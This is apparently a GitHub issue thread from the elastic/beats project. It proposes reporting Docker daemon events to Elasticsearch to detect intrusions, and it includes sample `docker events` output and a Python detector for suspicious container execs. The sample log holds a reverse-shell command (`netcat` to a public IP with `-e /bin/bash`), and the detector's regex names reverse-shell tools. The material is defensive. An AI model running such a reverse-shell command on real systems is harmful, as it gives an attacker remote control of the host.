The docker events utility can report the various Docker events that are happening.
In CLI terminal 1,
$ sudo docker exec -it kibana-container bash
$ sudo docker exec -it elasticsearch-container bash
$ sudo docker top kibana-container
<Attacker exploiting another application, and able to talk to a Docker daemon>
In CLI terminal 2,
# docker events
2018-04-07T21:13:06.015608218+05:30 container exec_create: bash 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:06.022901891+05:30 container exec_start: bash 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:34.756051931+05:30 container exec_create: bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:13:34.763466352+05:30 container exec_start: bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:20:11.095365653+05:30 container top 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:34:00.265485765+05:30 container exec_start: netcat 218.107.131.65 4444 -e /bin/bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
Reporting such Docker events to Elasticsearch via Auditbeat should help in detecting attacks (powered by CSRF or SSRF security flaws) and other intrusions against the Docker daemon (socket).
I learnt about this idea from @jeredding.
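The detection the issue body argues for, as an added example that is not part of the original issue or of the beats project: a small Python parser for the classic (text, pre-JSON) `docker events` line format shown above, plus rules that record every `exec_start` into a running container and raise severity when the exec command looks like a reverse shell bound to a public address. The sample input is the event output quoted in the issue; the regexes, the `DockerEvent`/`Alert` types and the severity names are this example's own assumptions, not anything Auditbeat or Metricbeat defines.

```python
"""Flag suspicious `docker exec` activity from `docker events` output.

Added example (not from elastic/beats). Assumes the classic text line format:
  <ts> container <action>[: <cmd>] <64-hex container id> (key=value, key=value)
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+container\s+(?P<action>\w+)"
    r"(?::\s(?P<cmd>.*?))?\s+(?P<cid>[0-9a-f]{64})\s+\((?P<attrs>[^)]*)\)\s*$"
)
# Command fragments typical of a reverse shell or a shell bound to a socket
# (assumed indicator list for this example).
REVERSE_SHELL_RE = re.compile(
    r"(?:\b(?:nc|ncat|netcat|socat)\b.*\s-e\s)|(?:\bbash\s+-i\b)|(?:/dev/tcp/)"
)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Sample input: the `docker events` lines quoted in the issue.
SAMPLE_EVENTS = """\
2018-04-07T21:13:06.015608218+05:30 container exec_create: bash 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:06.022901891+05:30 container exec_start: bash 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:13:34.756051931+05:30 container exec_create: bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:13:34.763466352+05:30 container exec_start: bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
2018-04-07T21:20:11.095365653+05:30 container top 6f7c48ea111d7a3844cf156d1855f51c5384abb19048d0320fb8a1b5041e5c6e (image=ubuntu, name=kibana-container)
2018-04-07T21:34:00.265485765+05:30 container exec_start: netcat 218.107.131.65 4444 -e /bin/bash 04e1d0c89fe114072c184cd940cdca6252058f7028b15f712bdd8aafbe9cb523 (image=ubuntu, name=elasticsearch-container)
"""


@dataclass
class DockerEvent:
    ts: str
    action: str
    cmd: Optional[str]          # None for actions without a command (e.g. top)
    container_id: str
    attrs: Dict[str, str]


@dataclass
class Alert:
    severity: str               # "medium" or "high" (assumed scale)
    ts: str
    container: str
    reason: str


def parse_event(line: str) -> Optional[DockerEvent]:
    """Parse one text-format event line; return None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    attrs: Dict[str, str] = {}
    for kv in m.group("attrs").split(","):
        key, _, value = kv.strip().partition("=")
        if key:
            attrs[key] = value
    return DockerEvent(m.group("ts"), m.group("action"), m.group("cmd"),
                       m.group("cid"), attrs)


def parse_events(text: str) -> List[DockerEvent]:
    return [ev for ev in (parse_event(l) for l in text.splitlines()) if ev]


def _is_public_ip(addr: str) -> bool:
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:
        return False


def analyze(events: List[DockerEvent]) -> List[Alert]:
    """Every exec_start is recorded; reverse-shell-looking commands are high severity."""
    alerts: List[Alert] = []
    for ev in events:
        # exec_create precedes every exec_start with the same command, so
        # alerting on exec_start alone avoids duplicate alerts; other actions
        # (top, start, die, ...) are not process execution inside the container.
        if ev.action != "exec_start" or not ev.cmd:
            continue
        name = ev.attrs.get("name", ev.container_id[:12])
        if REVERSE_SHELL_RE.search(ev.cmd):
            public = [ip for ip in IPV4_RE.findall(ev.cmd) if _is_public_ip(ip)]
            reason = f"reverse shell pattern in exec: {ev.cmd!r}"
            if public:
                reason += f" (connects to public IP {public[0]})"
            alerts.append(Alert("high", ev.ts, name, reason))
        else:
            alerts.append(Alert("medium", ev.ts, name,
                                f"exec into running container: {ev.cmd!r}"))
    return alerts


if __name__ == "__main__":
    for a in analyze(parse_events(SAMPLE_EVENTS)):
        print(f"[{a.severity}] {a.ts} {a.container}: {a.reason}")
```

Run against the sample, this yields two medium alerts for the interactive `bash` execs and one high alert for the `netcat ... -e /bin/bash` exec to a public address. In practice the same logic would sit behind an Elasticsearch query or alert rule on the shipped events rather than on raw CLI text, but the fields it needs (action, command, container name) are exactly those `docker events` already emits.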
@exekias I wonder if these are the same events we read internally for autodiscovery? If yes, this might fit better into Metricbeat, as we also collect the k8s ones there.
They are, we have a similar metricset in kubernetes (event), it reports all kubernetes events. It sounds to me that mimicking that one in the docker module would be a good idea.
@exekias should we re-title this to be metricbeat rather than auditbeat? Curious what it'd take to implement since it's come up in discussions regarding the cloud service again.
I took a first stab at it and it looks trivial, will open a PR soon: https://github.com/elastic/beats/compare/master...exekias:docker-events?expand=1